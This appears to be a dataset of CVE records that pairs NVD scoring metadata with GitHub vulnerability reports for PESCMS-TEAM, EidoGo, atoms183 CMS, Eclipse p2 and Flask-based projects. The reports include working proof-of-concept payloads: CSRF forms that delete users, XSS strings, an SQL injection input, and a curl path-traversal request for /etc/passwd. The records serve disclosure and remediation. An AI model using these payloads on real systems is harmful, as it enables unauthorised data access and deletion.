number of administrator just need to modify the id as '1'. ![3](https://user-images.githubusercontent.com/74637464/115212030-b3af9f00-a132-11eb-96fa-a335b758d727.png) Proof of Concept(PoC) ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/pescms/Public/?g=Team&m=User&a=action&id=36&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVVzZXImYT1pbmRleA==" method="POST"> <input type="hidden" name="" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` Visit this page of poc: ![4](https://user-images.githubusercontent.com/74637464/115212032-b4483580-a132-11eb-8ee1-b0bc75834103.png) ![5](https://user-images.githubusercontent.com/74637464/115212034-b4483580-a132-11eb-94be-9ff390d03112.png) We refresh the list of user ,that find that the user that called light is deleted. ![6](https://user-images.githubusercontent.com/74637464/115212037-b4e0cc00-a132-11eb-8bb4-2319a386dbad.png) ## Cross Site Request Forgery(CSRF)-3 ### Delete import information Technical Description: file: ``` pescms/App/Team/DELETE/Attachment.php pescms/App/Team/DELETE/Content.php pescms/App/Team/DELETE/Field.php pescms/App/Team/DELETE/Model.php pescms/App/Team/DELETE/Notice.php ``` Through CSRF to Delete important data is exist in these files. ALL the delete operations are not verify in front page. Like this: ![7](https://user-images.githubusercontent.com/74637464/115212039-b5796280-a132-11eb-926c-66c4b17959b4.png) Proof of Concept(PoC) ``` <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/pescms/Public/?g=Team&m=Project&a=action&id=1&method=DELETE&back_url=L3Blc2Ntcy9QdWJsaWMvP2c9VGVhbSZtPVByb2plY3QmYT1pbmRleA==" method="POST"> <input type="hidden" name="" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> ``` ![8](https://user-images.githubusercontent.com/74637464/115212046-b5796280-a132-11eb-93cd-ba04d2aff28a.png) refresh: ![9](https://user-images.githubusercontent.com/74637464/115212050-b611f900-a132-11eb-9670-a11f1b3b1d68.png) And other operations of delete are exist on this cms. Just give the positions,don't prove. ![10](https://user-images.githubusercontent.com/74637464/115212053-b6aa8f80-a132-11eb-92e5-1c1011502f59.png) ![11](https://user-images.githubusercontent.com/74637464/115212056-b7432600-a132-11eb-8fcb-2f48476afed5.png) ## Reflected XSS in App/Team/GET/Repoort.php ### In the method of extract, the CSRF also exist , but this is to prove the Rdflected XSS,not CSRF. In line 72-78 , the data from $_GET('begin') and $_GET('end') is transfer to variables, and output in pages. ![12](https://user-images.githubusercontent.com/74637464/115212061-b7432600-a132-11eb-9493-e2c13bf965e0.png) Proof of Concept(PoC) ``` localhost/pescms/Public/?g=Team&m=Report&a=extract&begin="onmouseover=alert(1)//&end=&user=0 or localhost/pescms/Public/?g=Team&m=Report&a=extract&begin=&end="onmouseover=alert(1)//&user=0 or,page: http://localhost/pescms/Public/?g=Team&m=Report&a=allExtract&begin="onmouseover=alert(1)//&end=&user=0 ``` ![13](https://user-images.githubusercontent.com/74637464/115212063-b7dbbc80-a132-11eb-8ef3-db3d91dcc9e2.png) ## In this page ,Reflected XSS can be combined with CSRF,this will cause bigger destruction
There are some vulnerabilities in cms.
https://api.github.com/repos/lazyphp/PESCMS-TEAM/issues/7/comments
1
2021-04-19T09:20:03Z
2021-04-19T09:29:30Z
https://github.com/lazyphp/PESCMS-TEAM/issues/7
861,094,547
7
3,825
CVE-2015-3172
2022-07-06T20:15:07.940
EidoGo is susceptible to Cross-Site Scripting (XSS) attacks via maliciously crafted SGF input.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jkk/eidogo/issues/27" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jkk/eidogo/pull/26" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jkk/eidogo/issues/27" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jkk/eidogo/pull/26" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eidogo:eidogo:*:*:*:*:*:*:*:*", "matchCriteriaId": "924144DF-9903-46D1-8926-720D9913E802", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/jkk/eidogo/issues/27
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jkk", "eidogo" ]
EidoGo is susceptible to Cross-Site Scripting (XSS) attacks via maliciously crafted SGF input. There are actually two separate XSS vulnerabilities: 1) Text from comments and game info are unsafely added into the DOM directly via innerHTML. 2) Any file loaded from URL that begins with a left-curly bracket "{" is assumed to be JSON and unsafely parsed with eval. Here are examples exploiting each vulnerability: http://eidogo.com/#xqRLkZhw http://eidogo.com/#AKilSuG4 A patch attempting to mitigate these security vulnerabilities was submitted in this pull request: https://github.com/jkk/eidogo/pull/26 See this pull request for more discussion of the changes. Note that the pull request does not include an updated minified file. However, a minified file incorporating this patch has been prepared by the OGS developers and is available here: http://cdn.online-go.com/eidogo.min.js Compare with: https://raw.githubusercontent.com/jkk/eidogo/master/player/js/all.compressed.js The identifier "CVE-2015-3172" has been assigned to refer to this issue. Disclosure timeline: April 7, 2015: Privately notified developer of security vulnerability April 13: Developer acknowledged notification May 12: Pull request submitted (as requested by developer) May 14: Webmasters of several affected sites notified in advance June 14: Public disclosure (having not heard back from developer since before the pull request)
XSS Security Vulnerability
https://api.github.com/repos/jkk/eidogo/issues/27/comments
7
2015-06-14T20:15:36Z
2021-11-02T23:11:09Z
https://github.com/jkk/eidogo/issues/27
88,241,816
27
3,826
CVE-2021-35283
2022-07-07T21:15:09.847
SQL Injection vulnerability in product_admin.php in atoms183 CMS 1.0, allows attackers to execute arbitrary commands via the Name, Fname, and ID parameters to search.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/atoms183/CMS/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/atoms183/CMS/issues/1" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:atoms183_cms_project:atoms183_cms:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "CE394319-D504-4901-85C9-4FA83BC9DDD7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/atoms183/CMS/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "atoms183", "CMS" ]
product_ Admin.php There is SQL injection in line 23 ``` $link=mysql_connect($host,$user,$pass); mysql_select_db($db_name,$link); //Если переменная Name передана if (isset($_POST["Name"])) { //Тут идет запрос $sql = mysql_query("INSERT INTO `info` (`Name`, `Fname`, `ID`) VALUES ('".$_POST['Name']."','".$_POST['Fname']."','".$_POST['ID']."')"); //Успех if ($sql) { echo "<p>Ваши данные успешно добавлены.</p>"; } else { echo "<p>Произошла ошибка.</p>"; } } ?> ``` Just submit the following post request `Name=aa',version(),4)#` search.php post : query=a
product_ Admin.php SQL injection
https://api.github.com/repos/atoms183/CMS/issues/1/comments
0
2021-06-09T05:44:41Z
2021-06-09T05:44:41Z
https://github.com/atoms183/CMS/issues/1
915,801,208
1
3,827
CVE-2021-41037
2022-07-08T04:15:13.833
In Eclipse p2, installable units are able to alter the Eclipse Platform installation and the local machine via touchpoints during installation. Those touchpoints can, for example, alter the command-line used to start the application, injecting things like agent or other settings that usually require particular attention in term of security. Although p2 has built-in strategies to ensure artifacts are signed and then to help establish trust, there is no such strategy for the metadata part that does configure such touchpoints. As a result, it's possible to install a unit that will run malicious code during installation without user receiving any warning about this installation step being risky when coming from untrusted source.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 10, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 6, "source": "emo@eclipse.org", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.1, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "emo@eclipse.org", "tags": [ "Mailing List", "Vendor Advisory" ], "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=577029" }, { "source": "emo@eclipse.org", "tags": null, "url": "https://github.com/eclipse-equinox/p2/issues/235" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Vendor Advisory" ], "url": "https://bugs.eclipse.org/bugs/show_bug.cgi?id=577029" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://github.com/eclipse-equinox/p2/issues/235" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eclipse:equinox_p2:*:*:*:*:*:*:*:*", "matchCriteriaId": "82D19D5B-3327-4797-A09C-A32EC26D1342", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "829" ]
829
https://github.com/eclipse-equinox/p2/issues/235
null
github.com
[ "eclipse-equinox", "p2" ]
This issue's description and proposed remediation will be edited as this issue evolves. It is currently a draft work in progress. Background: - https://bugs.eclipse.org/bugs/show_bug.cgi?id=577029 - https://nvd.nist.gov/vuln/detail/CVE-2021-41037 The CVE has this description: > In Eclipse p2, installable units are able to alter the Eclipse Platform installation and the local machine via touchpoints during installation. Those touchpoints can, for example, alter the command-line used to start the application, injecting things like agent or other settings that usually require particular attention in term of security. Although p2 has built-in strategies to ensure artifacts are signed and then to help establish trust, there is no such strategy for the metadata part that does configure such touchpoints. As a result, it's possible to install a unit that will run malicious code during installation without user receiving any warning about this installation step being risky when coming from untrusted source. The bugzilla has description: > p2 metadata, even without artifacts, can affect the application in unsafe way: touchpoints can run some local commands, change the command line that will be used to start the IDE (ie changing the JVM, adding some agents...). It seems relatively easy to inject malicious changes in p2 metadata. > Unlike artifacts, installing a unit that consists only of metadata doesn't show any warning to users. So they may install malicious code without any warning. There is no concept of "trusting" metadata like it exists for artifacts. > > On the long run, the solution would be to sign metadata as well, like other package managers -eg rpm- do. One thing seems clear up front. The oceans will need to significantly heat up before all p2 metadata will be properly and consistently signed and before the frameworks will properly check that. Often there can be a content.xml, content.jar, and/or content.xml.xz, all of which will need to be signed, though they typically contain (and should contain) the same semantic content. As such, all the ways of building these would need to produce such signatures and all such signatures would need to follow the artifact (metadata files) that they sign, e.g., the various of mirror applications and scripts would need to be aware of these new things, often needing to resign the resulting content. And finally, the consuming applications would all need to have installed a framework that checks these signatures. The whole ecosystem would need to support producing such things, not just Eclipse projects, i.e., those project with enough resource to deal with the associated workload. It seems to me like a giant hurdle, and then the actual concrete benefit versus the cost is questionable at best. We are circling around a topic for which there is a confusing and misleading mixture between related, yet different concepts, i.e., certification of origin, security, and trust. We can very easily install something from a known/certified source, via a secure connection that is nevertheless completely untrustworthy. As Christoph has pointed out, it's very easy to buy a signing certificate, get a free PGP signing key, and to provide content on an https accessible host, i.e., it's very, very easy to provide horribly malicious code. That would continue to be the case even if p2 metadata were signed. While it's suggested that signed artifacts are provided for trust, that's only indirectly/transitively the case; they are provided as a certification of origin, and one can choose to trust that origin. They have the added benefit that the certification follows the actual artifact. Here's a simple example of IUs that get installed that have touchpoints but no artifacts, and hence will not result in a trust prompt for certificates or PGP keys: - toolingorg.eclipse.platform.configuration 1.0.0 - `unconfigure=setProgramProperty(propName:osgi.instance.area.default,propValue:);` - `configure=setProgramProperty(propName:osgi.instance.area.default,propValue:@user.home/workspace);` - toolingorg.eclipse.equinox.launcher.win32.win32.x86_64 1.2.700.v20221108-1024 - `unconfigure=removeProgramArg(programArg:--launcher.library);removeProgramArg(programArg:@artifact);` - `uninstall=uninstallBundle(bundle:${artifact})` - `configure=addProgramArg(programArg:--launcher.library);addProgramArg(programArg:@artifact);` - `install=installBundle(bundle:${artifact})` - toolingorg.eclipse.platform.ide.config.win32.win32.x86_64 4.27.0.I20230302-0300 - `unconfigure=setProgramProperty(propName:eclipse.product,propValue:);setProgramProperty(propName:osgi.splashPath,propValue:);setProgramProperty(propName:osgi.bundles.defaultStartLevel,propValue:);setProgramProperty(propName:eclipse.application,propValue:);setProgramProperty(propName:eclipse.buildId,propValue:);` - `configure=setProgramProperty(propName:eclipse.product,propValue:org.eclipse.platform.ide);setProgramProperty(propName:osgi.splashPath,propValue:platform${#58}/base/plugins/org.eclipse.platform);setProgramProperty(propName:osgi.bundles.defaultStartLevel,propValue:4);setProgramProperty(propName:eclipse.application,propValue:org.eclipse.ui.ide.workbench);setProgramProperty(propName:eclipse.buildId,propValue:4.27.0.I20230302-0300);` - org.eclipse.platform.ide 4.27.0.I20230302-0300 - `configure=addRepository(type:0,location:https${#58}//download.eclipse.org/eclipse/updates/4.27,name:The Eclipse Project Updates);addRepository(type:1,location:https${#58}//download.eclipse.org/eclipse/updates/4.27,name:The Eclipse Project Updates);addRepository(type:0,location:https${#58}//download.eclipse.org/releases/2023-03,name:2023-03);addRepository(type:1,location:https${#58}//download.eclipse.org/releases/2023-03,name:2023-03);mkdir(path:${installFolder}/dropins);` - toolingorg.eclipse.platform.ide.executable.win32.win32.x86_64 4.27.0.I20230302-0300 - `uninstall=cleanupzip(source:@artifact, target:${installFolder});` - `install=unzip(source:@artifact, target:${installFolder});` - toolingorg.eclipse.equinox.launcher 1.6.400.v20210924-0641 - `unconfigure=removeProgramArg(programArg:-startup);removeProgramArg(programArg:@artifact);` - `uninstall=uninstallBundle(bundle:${artifact})` - `configure=addProgramArg(programArg:-startup);addProgramArg(programArg:@artifact);` - `install=installBundle(bundle:${artifact})` - toolingwin32.win32.x86_64org.eclipse.equinox.common 4.27.0.I20230302-0300 - `unconfigure=setStartLevel(startLevel:-1);markStarted(started: false);` - `uninstall=uninstallBundle(bundle:${artifact})` - `configure=setStartLevel(startLevel:2);markStarted(started: true);` - `install=installBundle(bundle:${artifact})` - toolingwin32.win32.x86_64org.eclipse.core.runtime 4.27.0.I20230302-0300 - `unconfigure=markStarted(started: false);` - `uninstall=uninstallBundle(bundle:${artifact})` - `configure=markStarted(started: true);` - `install=installBundle(bundle:${artifact})` - toolingwin32.win32.x86_64org.eclipse.equinox.simpleconfigurator 4.27.0.I20230302-0300 - `unconfigure=setStartLevel(startLevel:-1);markStarted(started: false);` - `uninstall=uninstallBundle(bundle:${artifact})` - `configure=setStartLevel(startLevel:1);markStarted(started: true);` - `install=installBundle(bundle:${artifact})` - toolingwin32.win32.x86_64org.eclipse.equinox.event 4.27.0.I20230302-0300 - `unconfigure=setStartLevel(startLevel:-1);markStarted(started: false);` - `uninstall=uninstallBundle(bundle:${artifact})` - `configure=setStartLevel(startLevel:2);markStarted(started: true);` - `install=installBundle(bundle:${artifact})` - org.eclipse.platform.ide.executable.win32.win32.x86_64.eclipse 4.27.0.I20230302-0300 - `unconfigure=setLauncherName()` - `configure=setLauncherName(name:eclipse)` - toolingorg.eclipse.platform.ide.ini.win32.win32.x86_64 4.27.0.I20230302-0300 - `unconfigure=removeJvmArg(jvmArg:-Dosgi.requiredJavaVersion=11);removeJvmArg(jvmArg:-Dosgi.dataAreaRequiresExplicitInit=true);removeJvmArg(jvmArg:-Dorg.eclipse.swt.graphics.Resource.reportNonDisposed=true);removeJvmArg(jvmArg:-Xms40m);removeJvmArg(jvmArg:-Xmx512m);removeJvmArg(jvmArg:--add-modules=ALL-SYSTEM);removeProgramArg(programArg:--launcher.defaultAction);removeProgramArg(programArg:openFile);removeProgramArg(programArg:--launcher.appendVmargs);` - `configure=addJvmArg(jvmArg:-Dosgi.requiredJavaVersion=11);addJvmArg(jvmArg:-Dosgi.dataAreaRequiresExplicitInit=true);addJvmArg(jvmArg:-Dorg.eclipse.swt.graphics.Resource.reportNonDisposed=true);addJvmArg(jvmArg:-Xms40m);addJvmArg(jvmArg:-Xmx512m);addJvmArg(jvmArg:--add-modules=ALL-SYSTEM);addProgramArg(programArg:--launcher.defaultAction);addProgramArg(programArg:openFile);addProgramArg(programArg:--launcher.appendVmargs);` - tooling.org.eclipse.update.feature.default 1.0.0 - `uninstall=uninstallFeature(feature:${artifact},featureId:default,featureVersion:default)` - `install=installFeature(feature:${artifact},featureId:default,featureVersion:default)` - toolingwin32.win32.x86_64org.eclipse.equinox.p2.reconciler.dropins 4.27.0.I20230302-0300 - `unconfigure=markStarted(started: false);` - `uninstall=uninstallBundle(bundle:${artifact})` - `configure=markStarted(started: true);` - `install=installBundle(bundle:${artifact})` - tooling.source.default 1.0.0 - `uninstall=removeSourceBundle(bundle:${artifact})` - `install=addSourceBundle(bundle:${artifact})` - toolingwin32.win32.x86_64org.apache.felix.scr 4.27.0.I20230302-0300 - `unconfigure=setStartLevel(startLevel:-1);markStarted(started: false);` - `uninstall=uninstallBundle(bundle:${artifact})` - `configure=setStartLevel(startLevel:2);markStarted(started: true);` - `install=installBundle(bundle:${artifact})` - tooling.osgi.bundle.default 1.0.0 - `unconfigure=` - `uninstall=uninstallBundle(bundle:${artifact})` - `configure=setStartLevel(startLevel:4);` - `install=installBundle(bundle:${artifact})` We should note that even if the p2 metadata were signed, once these instructions are applied, their origin can no longer tracked afterwards, unlike for actual installed artifacts (jars). I propose we take a step back and focus on what we can do to make this statement no longer true: > It's possible to install a unit that will run malicious code during installation without user receiving any warning about this installation step being risky when coming from untrusted source. In particular I'd like to propose that when we install/update that we present the user with the list of the corresponding sites of the IUs they are adding as part of that install/update operation. With the changes from https://github.com/eclipse-equinox/p2/issues/230 we already ensure that the sites are accessed securely typically via https. We can present a message as follows: > Installing content from arbitrary remote sites is risky. Do you with to trust content from the follows hosts. We could even collect the certificate information from those hosts to present to the user (as we do for jar-signed content). With that additional information, the user can effectively determine the origin of the content. We can of course make it possible to remember the trusted hosts as we do for trusted PGP keys so the user is not repeated prompted for the same origins. I feel that this approach provides the level of confirmation that the user needs to make informed decisions about what they are installing and where it's coming from. That approach makes the following statement accurate: > Before the user installs any content, they will be warned about the risk of installing content from untrusted sources and they will be provided a list of the actual sources being used for their consideration and approval. This approach can be implemented with minimal cost to the community while effectively giving the user both notification and control as spelled out in the CVE.
CVE-2021-41037: p2 metadata (even without artifacts) can be an attack vector
https://api.github.com/repos/eclipse-equinox/p2/issues/235/comments
19
2023-03-25T10:15:53Z
2024-07-12T13:49:47Z
https://github.com/eclipse-equinox/p2/issues/235
1,640,462,047
235
3,828
CVE-2022-31501
2022-07-11T01:15:08.040
The ChaoticOnyx/OnyxForum repository before 2022-05-04 on GitHub allows absolute path traversal because the Flask send_file function is used unsafely.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 9.3, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 4.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ChaoticOnyx/OnyxForum/commit/f25543dfc62a9694d7e4f67eebfa45e3de916053" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/github/securitylab/issues/669#issuecomment-1117265726" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ChaoticOnyx/OnyxForum/commit/f25543dfc62a9694d7e4f67eebfa45e3de916053" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/github/securitylab/issues/669#issuecomment-1117265726" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:onyxforum_project:onyxforum:*:*:*:*:*:*:*:*", "matchCriteriaId": "20DBF704-0F43-41D2-B854-46441B0944D3", "versionEndExcluding": null, "versionEndIncluding": "2022-05-04", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/github/securitylab/issues/669#issuecomment-1117265726
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "github", "securitylab" ]
### CVE(s) ID list This is a placeholder issue. I plan on sending bulk PR's to approx 100 projects. I will add the CVE once the fixes are merged and identifiers are assigned. ### All For One submission https://github.com/github/securitylab/issues/407 ### Details TBA ### Are you planning to discuss this vulnerability submission publicly? (Blog Post, social networks, etc). - [X] Yes - [ ] No ### Blog post link _No response_
Python : Flask Path Traversal Vulnerability
https://api.github.com/repos/github/securitylab/issues/669/comments
54
2022-04-28T19:02:52Z
2022-08-08T18:30:18Z
https://github.com/github/securitylab/issues/669
1,219,149,119
669
3,829
CVE-2022-31581
2022-07-11T01:15:11.227
The scorelab/OpenMF repository before 2022-05-03 on GitHub allows absolute path traversal because the Flask send_file function is used unsafely.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 9.3, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 4.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/github/securitylab/issues/669#issuecomment-1117265726" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/scorelab/OpenMF/issues/262" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/github/securitylab/issues/669#issuecomment-1117265726" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/scorelab/OpenMF/issues/262" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:scorelab:openmf:*:*:*:*:*:*:*:*", "matchCriteriaId": "DE5E2491-8B9E-492C-8CD1-C696BBBA7F0E", "versionEndExcluding": "2022-05-03", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/scorelab/OpenMF/issues/262
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "scorelab", "OpenMF" ]
# Absolute Path Traversal due to incorrect use of `send_file` call A path traversal attack (also known as directory traversal) aims to access files and directories that are stored outside the web root folder. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files. This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”. ## Common Weakness Enumeration category CWE - 36 ## Root Cause Analysis The `os.path.join` call is unsafe for use with untrusted input. When the `os.path.join` call encounters an absolute path, it ignores all the parameters it has encountered till that point and starts working with the new absolute path. Please see the example below. ``` >>> import os.path >>> static = "path/to/mySafeStaticDir" >>> malicious = "/../../../../../etc/passwd" >>> os.path.join(t,malicious) '/../../../../../etc/passwd' ``` Since the "malicious" parameter represents an absolute path, the result of `os.path.join` ignores the static directory completely. Hence, untrusted input is passed via the `os.path.join` call to `flask.send_file` can lead to path traversal attacks. In this case, the problems occurs due to the following code : https://github.com/scorelab/OpenMF/blob/28f86732a3d033ac674a8cd52b359628024e56c2/flask-backend/api/routes/case.py#L209 Here, the `file_pathname` parameter is attacker controlled. This parameter passes through the unsafe `os.path.join` call making the effective directory and filename passed to the `send_file` call attacker controlled. This leads to a path traversal attack. ## Proof of Concept The bug can be verified using a proof of concept similar to the one shown below. ``` curl -X POST 'http://<domain>/get-file' -H "Content-Type: application/x-www-form-urlencoded" -d "file_pathname=../../../../../../../etc/passwd" ``` ## Remediation This can be fixed by preventing flow of untrusted data to the vulnerable `send_file` function. In case the application logic necessiates this behaviour, one can either use the `werkzeug.utils.safe_join` to join untrusted paths or replace 